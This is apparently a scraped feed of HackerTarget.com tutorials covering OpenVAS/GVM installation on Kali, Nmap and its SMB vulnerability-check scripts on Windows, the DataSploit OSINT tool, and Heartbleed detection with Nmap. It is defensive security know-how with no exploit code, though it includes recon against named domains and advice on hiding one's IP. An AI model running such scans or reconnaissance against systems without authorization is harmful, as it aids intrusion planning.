     10,014 100%   10.57kB/s    0:00:00 (xfr#31, to-chk=2/43)
oval/5.10/org.mitre.oval/v/family/unix.xml
 31,372,831 100%  395.91kB/s    0:01:17 (xfr#32, to-chk=1/43)
oval/5.10/org.mitre.oval/v/family/windows.xml
 51,773,463 100%  396.37kB/s    0:02:07 (xfr#33, to-chk=0/43)

sent 3,061 bytes  received 1,206,268,870 bytes  408,559.50 bytes/sec
total size is 1,205,972,114  speedup is 1.00
/usr/sbin/openvasmd
[*] [3/3] Updating: Cert Data
Greenbone community feed server - http://feed.community.greenbone.net/
This service is hosted by Greenbone Networks - http://www.greenbone.net/

All transactions are logged.

If you have any questions, please use the Greenbone community portal. 
See https://community.greenbone.net for details.

By using this service you agree to our terms and conditions.

Only one sync per time, otherwise the source ip will be temporarely blocked.

receiving incremental file list
./
CB-K13.xml
  1,448,830 100%  387.74kB/s    0:00:03 (xfr#1, to-chk=23/25)
CB-K14.xml
  4,787,657 100%  399.75kB/s    0:00:11 (xfr#2, to-chk=22/25)

...

sha256sums.asc
        819 100%    1.02kB/s    0:00:00 (xfr#23, to-chk=1/25)
timestamp
         13 100%    0.02kB/s    0:00:00 (xfr#24, to-chk=0/25)

sent 614 bytes  received 57,604,789 bytes  390,545.11 bytes/sec
total size is 57,589,138  speedup is 1.00
/usr/sbin/openvasmd

[>] Stopping OpenVAS services
? greenbone-security-assistant.service - Greenbone Security Assistant
   Loaded: loaded (/lib/systemd/system/greenbone-security-assistant.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
     Docs: man:gsad(8)
           http://www.openvas.org/

? openvas-scanner.service - Open Vulnerability Assessment System Scanner Daemon
   Loaded: loaded (/lib/systemd/system/openvas-scanner.service; disabled; vendor preset: disabled)
   Active: failed (Result: signal) since Wed 2019-03-13 20:07:12 EDT; 39ms ago
     Docs: man:openvassd(8)
           http://www.openvas.org/
 Main PID: 124044 (code=killed, signal=KILL)

Mar 13 18:53:12 kali systemd[1]: Starting Open Vulnerability Assessment System Scanner Daemon...
Mar 13 18:53:12 kali systemd[1]: Started Open Vulnerability Assessment System Scanner Daemon.
Mar 13 20:07:09 kali systemd[1]: Stopping Open Vulnerability Assessment System Scanner Daemon...
Mar 13 20:07:12 kali systemd[1]: openvas-scanner.service: Main process exited, code=killed, status=9/KILL
Mar 13 20:07:12 kali systemd[1]: openvas-scanner.service: Failed with result 'signal'.
Mar 13 20:07:12 kali systemd[1]: Stopped Open Vulnerability Assessment System Scanner Daemon.

? openvas-manager.service - Open Vulnerability Assessment System Manager Daemon
   Loaded: loaded (/lib/systemd/system/openvas-manager.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
     Docs: man:openvasmd(8)
           http://www.openvas.org/

Mar 13 20:07:09 kali systemd[1]: openvas-manager.service: Main process exited, code=killed, status=15/TERM
Mar 13 20:07:09 kali systemd[1]: openvas-manager.service: Killing process 123944 (gpg-agent) with signal SIGKILL.
Mar 13 20:07:09 kali systemd[1]: openvas-manager.service: Succeeded.
Mar 13 20:07:09 kali systemd[1]: Stopped Open Vulnerability Assessment System Manager Daemon.

[>] Starting openvassd
[>] Migrating openvassd
[>] Rebuilding openvassd
[>] Stopping openvassd

[*] Please wait for the OpenVAS services to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI (Greenbone Security Assistant): https://127.0.0.1:9392

? greenbone-security-assistant.service - Greenbone Security Assistant
   Loaded: loaded (/lib/systemd/system/greenbone-security-assistant.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2019-03-13 20:10:10 EDT; 5s ago
     Docs: man:gsad(8)
           http://www.openvas.org/
 Main PID: 128106 (gsad)
    Tasks: 4 (limit: 14486)
   Memory: 3.3M
   CGroup: /system.slice/greenbone-security-assistant.service
   ??128106 /usr/sbin/gsad --foreground --listen=127.0.0.1 --port=9392 --mlisten=127.0.0.1 --mport=9390
   ??128112 /usr/sbin/gsad --foreground --listen=127.0.0.1 --port=9392 --mlisten=127.0.0.1 --mport=9390

Mar 13 20:10:10 kali systemd[1]: Started Greenbone Security Assistant.

? openvas-scanner.service - Open Vulnerability Assessment System Scanner Daemon
   Loaded: loaded (/lib/systemd/system/openvas-scanner.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2019-03-13 20:10:10 EDT; 5s ago
     Docs: man:openvassd(8)
           http://www.openvas.org/
  Process: 128105 ExecStart=/usr/sbin/openvassd --unix-socket=/var/run/openvassd.sock (code=exited, status=0/SUCCESS)
 Main PID: 128109 (openvassd)
    Tasks: 3 (limit: 14486)
   Memory: 7.7M
   CGroup: /system.slice/openvas-scanner.service
           ??128109 /usr/sbin/openvassd --unix-socket=/var/run/openvassd.sock
           ??128110 openvassd (Loading Handler)
           ??128111 openvassd: Reloaded 48300 of 49576 NVTs (97% / ETA: 00:00)

Mar 13 20:10:10 kali systemd[1]: Starting Open Vulnerability Assessment System Scanner Daemon...
Mar 13 20:10:10 kali systemd[1]: Started Open Vulnerability Assessment System Scanner Daemon.

? openvas-manager.service - Open Vulnerability Assessment System Manager Daemon
   Loaded: loaded (/lib/systemd/system/openvas-manager.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2019-03-13 20:10:10 EDT; 5s ago
     Docs: man:openvasmd(8)
           http://www.openvas.org/
  Process: 128107 ExecStart=/usr/sbin/openvasmd --listen=127.0.0.1 --port=9390 --database=/var/lib/openvas/mgr/tasks.db (code=exited, status=0/SUCCESS)
 Main PID: 128108 (openvasmd)
    Tasks: 1 (limit: 14486)
   Memory: 74.4M
   CGroup: /system.slice/openvas-manager.service
           ??128108 openvasmd

Mar 13 20:10:10 kali systemd[1]: Starting Open Vulnerability Assessment System Manager Daemon...
Mar 13 20:10:10 kali systemd[1]: Started Open Vulnerability Assessment System Manager Daemon.

[*] Opening Web UI (https://127.0.0.1:9392) in: 5... 4... 3... 2... 1... 

[>] Checking for admin user
[*] Creating admin user
User created with password '450cbcd2-9999-405f-2222-951055a5e938'.

[+] Done

By utilising the prebuilt configuration script we can get up and running with OpenVAS in a very short amount of time.

OpenVAS Web Client (Green Security Assistant)

Access the Greenbone Web Client using your web browser. Login with admin and the password in the script output and you will be launching a scan of your target systems within a few minutes.

gsad

Lets first check that gsad is running and listening.

root@kali:~# netstat -apn | grep LISTEN
tcp    0  0 127.0.0.1:9390      0.0.0.0:*           LISTEN      128108/openvasmd    
tcp    0  0 127.0.0.1:80        0.0.0.0:*           LISTEN      128112/gsad         
tcp    0  0 127.0.0.1:9392      0.0.0.0:*           LISTEN      128106/gsad

Now browse to https://localhost:9392/. The Greenbone Security Assistant is a web portal front end to the GVM and OpenVAS scanner.

Task Wizard

The quickest way to fire off a scan is using the Task Wizard.

Enter the target and scan profile. Launch. Results are available under the reports option.

Modify gsad to listen on all interfaces

In the netstat output above, we can see that gsad is only listening on localhost. Here is how to change it so you can access the web interface over your local network.

Kali 2019 is using systemd for its services so we have to edit the following file to make the web interface listen on all interfaces.

root@kali:~# vi /lib/systemd/system/greenbone-security-assistant.service

Now change the 127.0.0.1 to 0.0.0.0, we also need to add a new parameter to the ExecStart line. This allows remote hosts to connect to our IP address (or hostname). Otherwise, we will get the following error in the browser:

The request contained an unknown or invalid Host header. If you are trying to access GSA via its hostname or a proxy, make sure GSA is set up to allow it.

If your IP address is 192.168.1.100 then make the changes as shown below.

[Unit]
Description=Greenbone Security Assistant
Documentation=man:gsad(8) http://www.openvas.org/
Wants=openvas-manager.service

[Service]
Type=simple
PIDFile=/var/run/gsad.pid
ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=0.0.0.0 --mport=9390 --allow-header-host 192.168.1.100

[Install]
WantedBy=multi-user.target

Now restart the service and check with netstat or ss.

root@kali:~# systemctl daemon-reload
root@kali:~# systemctl restart greenbone-security-assistant.service 
root@kali:~# netstat -anp | grep gsad
tcp   0  0 0.0.0.0:80        0.0.0.0:*           LISTEN   128654/gsad         
tcp   0  0 0.0.0.0:9392      0.0.0.0:*           LISTEN   128653/gsad

Looks like we are up and running, now you can access the OpenVAS web interface from any system on your network.

OpenVAS Command Line Client (omp or gvm-cli)

Accessing OpenVAS from the command line is a powerful feature that gives you full control over scan tasks, reports and other management tasks. The current client in Kali is the omp client. Newer versions of GVM will use the gvm-cli command that is part of the gvm-tools package.

Both clients use XML to perform actions on the GVM server. The omp client has a number of command line switches, but the XML is where the real power lies.

root@kali:~# omp --help
Usage:
  omp [OPTION…] - OpenVAS OMP Command Line Interface

Help Options:
  -?, --help                       Show help options

Application Options:
  -h, --host=                Connect to manager on host 
  -p, --port=              Use port number 
  -V, --version                    Print version.
  -v, --verbose                    Verbose messages (WARNING: may reveal passwords).
  --use-certs                      Use client certificates to authenticate.
  --client-cert=        Client certificate. Default: /usr/var/lib/openvas/CA/clientcert.pem
  --client-key=          Client key. Default: /usr/var/lib/openvas/private/CA/clientkey.pem
  --client-ca-cert=     Client CA certificate. Default: /usr/var/lib/openvas/CA/cacert.pem
  -u, --username=        OMP username
  -w, --password=        OMP password
  --config-file=      Configuration file for connection parameters.
  -P, --prompt                     Prompt to exit.
  -O, --get-omp-version            Print OMP version.
  -n, --name=                Name for create-task.
  -C, --create-task                Create a task.
  -m, --comment=             Comment for create-task.
  -c, --config=            Config for create-task.
  -t, --target=            Target for create-task.
  -E, --delete-report              Delete one or more reports.
  -D, --delete-task                Delete one or more tasks.
  -R, --get-report                 Get report of one task.
  -F, --get-report-formats         Get report formats. (OMP 2.0 only)
  -f, --format=            Format for get-report.
  --filter=                Filter string for get-report
  -G, --get-tasks                  Get status of one, many or all tasks.
  -g, --get-configs                Get configs.
  -T, --get-targets                Get targets.
  -i, --pretty-print               In combination with -X, pretty print the response.
  -S, --start-task                 Start one or more tasks.
  -M, --modify-task                Modify a task.
  --ping                           Ping OMP server
  --timeout=               Wait  seconds for OMP ping response
  --file                           Add text in stdin as file on task.
  -X, --xml=              XML command (e.g. "").  "-" to read from stdin.
  --send-file=               Replace SENDFILE in xml with base64 of file.
  --details                        Enable detailed view.

OpenVAS Python Client (python-gvm)

A new feature coming with GVM is the ability to use a python client to manage the system. This is very exciting, particularly for those who like to automate all the things with Python.

Next Steps

OpenVAS (GVM) has a large number of moving parts, services, and configuration items. If you have any issues with the different services, we have an OpenVAS tutorial and guide that includes many tips for keeping an OpenVAS installation running smoothly.

Now that you have a local system ready to scan your internal network, take a look at our hosted solution where we provide the cloud infrastructure so you can check your network perimeter from the attackers' perspective.

Know Your Network

Hosted Security Tools. Tactical Results.

USE CASES

The post Install OpenVAS (GVM) on Kali 2019 appeared first on HackerTarget.com.

]]> https://hackertarget.com/using-nmap-on-windows/ Thu, 24 May 2018 10:29:37 +0000 http://hackertarget.com/?p=3199 Running Nmap on Windows is not as difficult or problematic as it was in the past. Nmap is supported on Windows 7 and higher with performance close to if not quite as good as Linux based operating systems. The majority of users still do use *nix based systems however a good number of people use […]

The post Using Nmap on Windows appeared first on HackerTarget.com.

]]> Running Nmap on Windows is not as difficult or problematic as it was in the past. Nmap is supported on Windows 7 and higher with performance close to if not quite as good as Linux based operating systems. The majority of users still do use *nix based systems however a good number of people use it on Windows.

By installing Nmap on your Windows based systems you have access to the world's best port scanner for security testing and troubleshooting of network connectivity. In addition you have ncat available a full-featured version of netcat a virtual swiss army knife for networks. I am a big fan of ncat and encourage any system administrator or techie to explore the options.

Installing Nmap for Windows

To install the Windows version of Nmap download the executable installer and click through the wizard. It is your standard Next | Next | Next | finish... all done. By default, the Nmap installation directory will be added to the system path. With Nmap in your system path, you can run nmap or ncat from any command window.

It will run on all the more modern versions of Windows including Windows 7, 2008 and Windows 10. If you are running something older such as 2K or earlier you may run into problems, but if you are still on those platforms you already have problems...

If you install from the zip file, there are a few additional configuration items to be aware of and apply. These are all documented on the nmap installation page for Windows.

Nmap on the Windows Command Line

During a default installation of the Nmap Windows package, the installation path will be added to the system path. Simply fire up a command prompt and launch nmap. If you installed from the standalone zip file, you need to add the installation folder to the system path manually through system properties.

As you can see the familiar Nmap command options appear after running the command. Access to the Nmap NSE scripts is available as are all the standard options.

Zenmap on Windows

Zenmap is an excellent GUI front-end to the Nmap core scanning engine. It has some pretty nifty features that are not available with the command line version, in particular the network topology map. This rivals commercial mapping tools that perform a similar function and is a nice feature.

It is also intuitive to browse through results from different hosts using Zenmap, there are options to save the results in standard Nmap format (.nmap) or as XML (.xml) for further processing. There does not appear to be the option to save in the standard Grep format (-oG).

Zenmap is available on Windows and Linux distributions, it can be a great introduction for those less familiar with the command line.

Testing SMB Security with Nmap NSE Scripts

Bundled with Nmap are addon scripts that perform all manner of functionality. Of note to those in a Windows environment are the 34 smb- scripts that are available. These allow enumeration of entities on Windows systems remotely using the Microsoft SMB protocol (port 445). Examples include smb-os-discovery, smb-enum-users and smb-brute.

There are also vulnerability detection scripts, for testing even the most recent high profile Windows vulnerabilities. Head over to the Nmap NSE scripts page for all the documentation and a list of the scripts.

smb-vuln-ms08-067	Test Microsoft Windows systems for the very popular remote code execution vulnerability known as MS08-067. For years this was the go to exploit when using Metasploit. Note this check is dangerous and it may crash systems.
smb-vuln-ms10-054	Detect whether target machines are vulnerable to ms10-054 the SMB remote memory corruption vulnerability.
smb-vuln-ms10-061	Attempts to discover whether systems are vulnerable to ms10-061 Printer Spooler vulnerability.
smb-vuln-ms17-010	Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability ms17-010. The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

Wrapping Up

Having access to both Nmap and ncat when on a Windows system is very convenient and lots of fun. There is an amazing number of tricks that can be done with ncat, whether you are troubleshooting, security testing or just need some network-fu during a penetration test.

There are now 600 Nmap NSE scripts. The capabilities these provide is another bonus for having Nmap installed on your Windows workstation. Using the bundled scripts there are large number of short cuts and tests that can be conducted that might otherwise be difficult without additional software installed.

Thanks for reading, we also have a tutorial and cheat sheet for those wanting to discover more about this excellent tool.

Know Your Perimeter

Trusted tools. Hosted to save you time.

Hosted Nmap

The post Using Nmap on Windows appeared first on HackerTarget.com.

]]> https://hackertarget.com/datasploit-tutorial/ Sat, 17 Feb 2018 06:01:27 +0000 https://hackertarget.com/?p=9491 DataSploit Installation Often used with the Kali Linux penetration testing distribution, installing within Kali or Ubuntu Linux is a simple process. Ensure you have git and pip installed. test@ubuntu:~/$ git clone https://github.com/datasploit/datasploit test@ubuntu:~/$ cd datasploit test@ubuntu:~/datasploit/$ pip install -r requirements.txt test@ubuntu:~/datasploit/$ mv config_sample.py config.py test@ubuntu:~/datasploit/$ python datasploit.py -h True usage: datasploit.py [-h] [-i SINGLE_TARGET] [-f […]

The post DataSploit Tutorial appeared first on HackerTarget.com.

]]>

What is DataSploit?

DataSploit is an open source intelligence collection (OSINT) tool. It is a simple way to dump data for a domain or other piece of metadata.

Running DataSploit from the command line, enter an input to search on, or choose to import search data from a text file.

DataSploit Installation

Often used with the Kali Linux penetration testing distribution, installing within Kali or Ubuntu Linux is a simple process.

Ensure you have git and pip installed.

test@ubuntu:~/$ git clone https://github.com/datasploit/datasploit
test@ubuntu:~/$ cd datasploit
test@ubuntu:~/datasploit/$ pip install -r requirements.txt
test@ubuntu:~/datasploit/$ mv config_sample.py config.py
test@ubuntu:~/datasploit/$ python datasploit.py -h
True
usage: datasploit.py [-h] [-i SINGLE_TARGET] [-f FILE_TARGET] [-a] [-q]
                     [-o OUTPUT]

  ____/ /____ _ / /_ ____ _ _____ ____   / /____   (_)/ /_
 / __  // __ `// __// __ `// ___// __ \ / // __ \ / // __/
/ /_/ // /_/ // /_ / /_/ /(__  )/ /_/ // // /_/ // // /_
\__,_/ \__,_/ \__/ \__,_//____// .___//_/ \____//_/ \__/
                              /_/

           Open Source Assistant for #OSINT
               www.datasploit.info

optional arguments:
  -h, --help            show this help message and exit
  -i SINGLE_TARGET, --input SINGLE_TARGET
                        Provide Input
  -f FILE_TARGET, --file FILE_TARGET
                        Provide Input
  -a, --active          Run Active Scan attacks
  -q, --quiet           Run scans in automated manner accepting default
                        answers
  -o OUTPUT, --output OUTPUT
                        Provide Destination Directory

              Connect at Social Media: @datasploit
                

Similar to recon-ng you will need to configure API keys to get the full value from this tool. As different Internet resources are searched, the API key will allow you get additional and more detailed data.

To add the API keys you need to add them to config.py file.

DataSploit as Python Module

A nice feature of this tool is the ability to load it as a Python module for use in your own Python tools. pip install datasploit will get you started then head over to the Help Pages for more information.

Using DataSploit

From the command line you can run the tool with an single target parameter to find information on a single domain.

Rather than selecting modules to use, this tool has a go at whatever modules are available and configured.

~/datasploit$ python datasploit.py -i microsoft.com
True

  ____/ /____ _ / /_ ____ _ _____ ____   / /____   (_)/ /_
 / __  // __ `// __// __ `// ___// __ \ / // __ \ / // __/
/ /_/ // /_/ // /_ / /_/ /(__  )/ /_/ // // /_/ // // /_
\__,_/ \__,_/ \__/ \__,_//____// .___//_/ \____//_/ \__/
                              /_/

           Open Source Assistant for #OSINT
               www.datasploit.info


Target: microsoft.com
Looks like a DOMAIN, running domainOsint...

[-] Skipping Googlepdf because it is marked as disabled.
[-] Skipping Zoomeye because it is marked as disabled.
---> Finding subdomains, will be back soon with list. 

 [+] Extracting subdomains from DNS Dumpster

 [+] Extracting subdomains Netcraft

 [+] Extracting subdomains from Certificate Transparency Reports

As you can see there is a sub domain search module for our own project DNSDumpster.

With a configured Shodan API key, we can dump subdomains for the target domain and these will then be searched for open ports and other scan data through the Shodan API.

** results snipped **
---> Wapplyzing web page of base domain:

Hitting HTTP and HTTPS:
[+] Third party libraries in Use for HTTP:
  Apache
  Google Analytics
  Google AdSense
  CentOS
[+] Third party libraries in Use for HTTPS:
  Apache
  Google Analytics
  Google AdSense
  CentOS

-----------------------------


---> Searching in Shodan:

IP: 77.xx.44.55
Hosts: [u'test.microsoft.com']
Domain: [u'test.microsoft.com']
Port: 80
Content-Type: text/html; charset=UTF-8
Location: {u'city': u'Fremont', u'region_code': u'CA', u'area_code': 510, u'longitude': -121.9829, u'country_code3': u'USA', u'country_name': u'United States', u'postal_code': u'94536', u'dma_code': 807, u'country_code': u'US', u'latitude': 37.56700000000001}

** results snipped **

While I have snipped most of the results above there are a couple of Interesting things to keep in mind.

In particular the fact that the Wapplyzing module has pulled some data on HTML/Javascript libraries of the main domain. These results have been gathered by querying the domain from your current Internet connection.

Active vs Passive vs Semi-Passive

Definitions can vary but I generally categorize these types of reconnasance as follows:

Active involves active probes against the target, including such things as Port Scanning. That is sending traffic to the target that is not "normal". Normal being a browser viewing a legitimate web page.

Passive indicates no packets are sent to the target network. All data collection is done through third party sites. These of course may then perform the query on your behalf depending on the service.

Semi-Passive is the category I would place this tool in. That being it does send traffic to the target but it is a standard web browser request as seen in the wappalyzer results.

The key takeaway here is that if you are doing OSINT research for incident response and wish to keep your local IP address from target web server logs you should use a VPS or other layer of anonymity.

Conclusion

DataSploit is a fast and easy tool that can gather a range of data very quickly with minimal configuration.

Go and grab the latest version and start testing. A good place to start testing is various bug bounty programs. By selecting a range of bug bounty programs you will be able to test the tool against a number of varied targets and you may even stumble upon an item of interest.

If you have any suggestions for improvement or have any questions related to this DataSploit Tutorial please get in contact.

The post DataSploit Tutorial appeared first on HackerTarget.com.

First, a working version of Nmap (at least version 6.25), this is not difficult to find or install. So lets jump ahead to running an NSE Script to detect the Heartbleed vulnerability.

Download the NSE (ssl-heartbleed.nse) script and the tls.lua library that is required:

ssl-heartbleed.nse tls.lua

Now place the tls.lua in the nselib directory on the system you are running Nmap on. Note: I have not tested this on Windows, only Ubuntu Linux, however it should just be a matter of dropping it in the nselib folder (C:\program files\nmap\nselib).

Running the actual ssl-heartbleed.nse script is simply a matter of referencing it as a parameter to the Nmap command.

nmap -sV -p 443 --script=ssl-heartbleed.nse 192.168.1.1

It really is as simple as that, point to the nse script with the --script= and you are cooking! Even better as this is using Nmap, we can scan entire ranges of IP addresses for the vulnerability.

Testing for the vulnerability

Here is an example of a test against one of my local systems that was running a vulnerable version of OpenVPN-AS.

Nmap scan report for mediacentre (192.168.1.5)
Host is up (0.0059s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE     VERSION
443/tcp  open  ssl         OpenSSL (SSLv3)
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt 
|_      http://cvedetails.com/cve/2014-0160/
Service Info: Host:  firefly003; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Not good! looks to be well and truly vulnerable.

Upgrade OpenVPN

OpenVPN had advised that upgrades are required. It was a matter of a quick dpkg -i to upgrade the OpenVPN-AS server on my home network.

Lets try again with another test.

Nmap scan report for mediacentre (192.168.1.5)
Host is up (0.0011s latency).
PORT    STATE SERVICE VERSION
443/tcp open  ssl     OpenSSL (SSLv3)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds

Looks good to me, upgrade successful.

The post Testing Heartbleed with the Nmap NSE script appeared first on HackerTarget.com.